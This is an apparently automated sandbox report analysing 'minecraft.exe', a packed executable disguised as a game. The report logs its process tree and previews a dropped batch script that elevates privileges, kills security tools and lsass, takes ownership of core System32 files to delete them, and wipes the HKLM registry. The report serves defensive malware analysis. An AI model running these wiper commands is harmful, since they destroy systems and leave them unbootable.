Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000C4D0 RtlRemoveVectoredExceptionHandler,RtlAddVectoredExceptionHandler,0_2_000000014000C4D0
Source: C:\Users\user\Desktop\minecraft.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\drivers /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\shutdown.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\shutdown.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im lsass.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im lsass.exeJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wlrmdr.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\wlrmdr.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\System32\wlrmdr.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
11
Process Injection
1
Disable or Modify Tools
OS Credential Dumping11
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API
1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
Modify Registry
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
1
DLL Side-Loading
2
Virtualization/Sandbox Evasion
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Obfuscated Files or Information
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Services File Permissions Weakness
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
File Deletion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1544867 Sample: minecraft.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 64 21 Antivirus / Scanner detection for submitted sample 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 Machine Learning detection for sample 2->25 27 AI detected suspicious sample 2->27 7 minecraft.exe 8 2->7         started        9 wlrmdr.exe 2->9         started        process3 process4 11 cmd.exe 1 7->11         started        process5 13 icacls.exe 1 11->13         started        15 takeown.exe 1 11->15         started        17 taskkill.exe 1 11->17         started        19 25 other processes 11->19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
minecraft.exe34%ReversingLabs
minecraft.exe100%AviraHEUR/AGEN.1339739
minecraft.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1544867
Start date and time:2024-10-29 20:36:27 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:35
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:minecraft.exe
Detection:MAL
Classification:mal64.winEXE@59/2@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 27
  • Number of non-executed functions: 36
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeleteKey calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: minecraft.exe
No simulations
No context
No context
No context
No context
No context
Process:C:\Users\user\Desktop\minecraft.exe
File Type:ASCII text, with very long lines (331), with CRLF line terminators
Category:dropped
Size (bytes):2316
Entropy (8bit):4.9309969875549875
Encrypted:false
SSDEEP:48:aRMtmR8X+DxHm2A1d+X7VKnxR8YU7bJSARDKrRKNf:aRwW5AQZmxSAARDW6f
MD5:EBCFB026E8F9137C99136AB348CB6817
SHA1:FBAD88AEE4E564567A7B9C11934ADE9FC3C0A47D
SHA-256:73E3D00900152813C2D3DA00E2F16A162787E7DE747E5D3E18A06CEFE3E1AD51
SHA-512:110422386157CAF977A9E952C859344BF21AEE9E0D148E42C2026428D3A9E20AFFE05E3C1F96082E943DDC6EA671F15E30F8C2B42F9D75845CB1ABF2867DA9B7
Malicious:false
Preview:@shift /0..set "params=%*"..cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )..cd %SystemRoot%\System32....taskkill /f /im taskmgr.exe..taskkill /f /im regedit.exe....takeown /f %SystemRoot%\System32\hal.dll /r /d y..icacls %SystemRoot%\System32\hal.dll /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\hal.dll....takeown /f %SystemRoot%\System32\winload.exe /r /d y..icacls %SystemRoot%\System32\winload.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winload.exe....takeown /f %SystemRoot%\System32\winresume.exe /r /d y..icacls %SystemRoot%\System32\winresume.exe /grant everyone:F /t..del /f /s /q %SystemRoot%\System32\winresume.exe....takeown /f %SystemRoot%\System32\winlogon.exe /r /d y..i
Process:C:\Windows\System32\fsutil.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):4.17699200758583
Encrypted:false
SSDEEP:3:QAFrf2WwFhMjn:QgL2zhMj
MD5:870D97F130F8CDC708141C407389BE3A
SHA1:B869CF43CD47F97E9883A9538FB157F2F79F51DC
SHA-256:2C09238165070B4B23C709CBF1FD749E0FB645EB64B4A8B189E5E3DB2CF2EF59
SHA-512:BFC916325F759F95C68A59AAECB3DAF4DC5BDAB9BFDC48E817BDB5CA20BAFA355BD0699668BD63420E354751DC1116F4A50949BC4ECBA8E54644BAB10FED3099
Malicious:false
Preview:Volume - C: is NOT Dirty..
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.933608818810724
TrID:
  • Win64 Executable GUI (202006/5) 81.25%
  • UPX compressed Win32 Executable (30571/9) 12.30%
  • Win64 Executable (generic) (12005/4) 4.83%
  • Generic Win/DOS Executable (2004/3) 0.81%
  • DOS Executable Generic (2002/1) 0.81%
File name:minecraft.exe
File size:56'832 bytes
MD5:09718d571b01cb93e6f983be7b99a4b2
SHA1:d2d1212212bfc691e115b24e8132ae4658e510e8
SHA256:6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169
SHA512:9c7fad95ad56c1f457be067467886c7d23fa57734547688c64d16f37f3190cc017987278a2387b217e4a8108ac04d33b1fe5353cfb350717a839ecb6dd533098
SSDEEP:1536:34dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNiPJ:34dzVTaer344JzthRZijQ1Ji
TLSH:0643F1B7557DE8BCC42312B293CD0044B66F262B67C9172F1990A7FFC8EA2D4A741752
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.........p..@H.........@.............................p.............................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x140024840
Entrypoint Section:UPX1
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:a50e815adb2cfe3e58d388c791946db8
Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFFF37DAh]
dec eax
lea edi, dword ptr [esi-00017025h]
push edi
mov eax, 00022A7Fh
push eax
dec eax
mov ecx, esp
dec eax
mov edx, edi
dec eax
mov edi, esi
mov esi, 0000C80Eh
push ebp
dec eax
mov ebp, esp
inc esp
mov ecx, dword ptr [ecx]
dec ecx
mov eax, edx
dec eax
mov edx, esi
dec eax
lea esi, dword ptr [edi+02h]
push esi
mov al, byte ptr [edi]
dec edx
mov cl, al
and al, 07h
shr cl, 00000003h
dec eax
mov ebx, FFFFFD00h
dec eax
shl ebx, cl
mov cl, al
dec eax
lea ebx, dword ptr [esp+ebx*2-00000E78h]
dec eax
and ebx, FFFFFFC0h
push 00000000h
dec eax
cmp esp, ebx
jne 00007F47B0D575ABh
push ebx
dec eax
lea edi, dword ptr [ebx+08h]
mov cl, byte ptr [esi-01h]
dec edx
mov byte ptr [edi+02h], al
mov al, cl
shr cl, 00000004h
mov byte ptr [edi+01h], cl
and al, 0Fh
mov byte ptr [edi], al
dec eax
lea ecx, dword ptr [edi-04h]
push eax
inc ecx
push edi
dec eax
lea eax, dword ptr [edi+04h]
inc ebp
xor edi, edi
inc ecx
push esi
inc ecx
mov esi, 00000001h
inc ecx
push ebp
inc ebp
xor ebp, ebp
inc ecx
push esp
push ebp
push ebx
dec eax
mov dword ptr [esp-10h], ecx
dec eax
mov dword ptr [esp-28h], eax
mov eax, 00000001h
dec eax
mov dword ptr [esp-08h], esi
dec esp
mov dword ptr [esp-18h], eax
mov ebx, eax
inc esp
mov dword ptr [esp-1Ch], ecx
movzx ecx, byte ptr [edi+02h]
shl ebx, cl
mov ecx, ebx
dec eax
mov ebx, dword ptr [esp+38h]
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x264c00x28c.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x4c0.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
UPX00x10000x170000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX10x180000xe0000xd400af315d6203ea6eb29fa8414ac4c1a31aFalse0.9776127653301887data7.984045486047318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x260000x10000x800440d0cb7689962d3cc294ff5058f60a8False0.4443359375data4.400131271195068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
NameRVASizeTypeLanguageCountryZLIB Complexity
RT_RCDATA0x2221c0x1very short file (no magic)9.0
RT_RCDATA0x222200xcdata1.6666666666666667
RT_RCDATA0x2222c0x12Non-ISO extended-ASCII text, with no line terminators1.5
RT_RCDATA0x222400x902data1.004770164787511
RT_MANIFEST0x262200x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334
DLLImport
COMCTL32.DLLInitCommonControlsEx
GDI32.DLLGetStockObject
KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
msvcrt.dllfree
OLE32.DLLCoInitialize
SHELL32.DLLShellExecuteExW
SHLWAPI.DLLPathRemoveArgsW
USER32.DLLSetFocus
WINMM.DLLtimeBeginPeriod
No network behavior found

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:15:37:21
Start date:29/10/2024
Path:C:\Users\user\Desktop\minecraft.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\Desktop\minecraft.exe"
Imagebase:0x140000000
File size:56'832 bytes
MD5 hash:09718D571B01CB93E6F983BE7B99A4B2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe"
Imagebase:0x7ff7dee90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff68cce0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\fsutil.exe
Wow64 process (32bit):false
Commandline:fsutil dirty query C:
Imagebase:0x7ff7f0090000
File size:214'840 bytes
MD5 hash:DE00EDA7134D3365E6074700E3008CAD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im taskmgr.exe
Imagebase:0x7ff754c90000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im regedit.exe
Imagebase:0x7ff754c90000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:7
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\hal.dll /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:8
Start time:15:37:22
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:15:37:24
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\winload.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:15:37:24
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:15:37:24
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\winresume.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:15:37:24
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\winlogon.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\wininit.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:15:37:25
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:15:37:26
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\regedit.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:15:37:26
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:15:37:26
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:15:37:26
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:15:37:27
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\consent.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:15:37:27
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:15:37:27
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\drivers /r /d y
Imagebase:0x7ff6018f0000
